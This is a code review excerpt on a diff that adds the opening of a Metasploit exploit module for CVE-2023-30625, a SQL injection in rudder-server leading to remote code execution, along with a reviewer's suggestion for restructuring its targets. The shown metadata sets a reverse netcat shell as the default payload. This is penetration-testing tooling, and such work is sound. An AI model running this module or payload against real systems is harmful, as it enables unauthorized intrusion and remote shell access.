modules/exploits/multi/http/rudder_server_sqli_rce.rb

```diff
@@ -0,0 +1,112 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::FileDropper
+  include Msf::Exploit::Remote::HttpClient
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Rudder Server SQLI Remote Code Execution',
+        'Description' => %q{
+          This Metasploit module exploits a SQL injection vulnerability in
+          RudderStack's rudder-server, an open source Customer Data Platform (CDP).
+          The vulnerability exists in versions of rudder-server prior to 1.3.0-rc.1.
+          By exploiting this flaw, an attacker can execute arbitrary SQL commands,
+          which may lead to Remote Code Execution (RCE) due to the `rudder` role
+          in PostgresSQL having superuser permissions by default.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Ege Balcı <egebalci@pm.me>' # msf module
+        ],
+        'References' => [
+          ['CVE', '2023-30625'],
+          ['URL', 'https://securitylab.github.com/advisories/GHSL-2022-097_rudder-server/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2023-30625'],
+        ],
+        'DefaultOptions' => {
+          'SSL' => false,
+          'WfsDelay' => 5
+        },
+        'Platform' => [ 'unix', 'linux' ],
+        'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
+        'Targets' => [
+          ['Automatic', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
+          ['Linux', { 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_netcat' } }],
```

Comment:
```suggestion
          [
            'Unix Command',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD,
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/unix/reverse_netcat'
              }
            }
          ],
```

This changes the name from `Linux` to `Unix Command` to match the unix command payload. Also this sets a target `Type` which can be used to reference the target below more accurately instead of referencing an index in the `targets[]` array. 

Please change the windows target to match this format as well.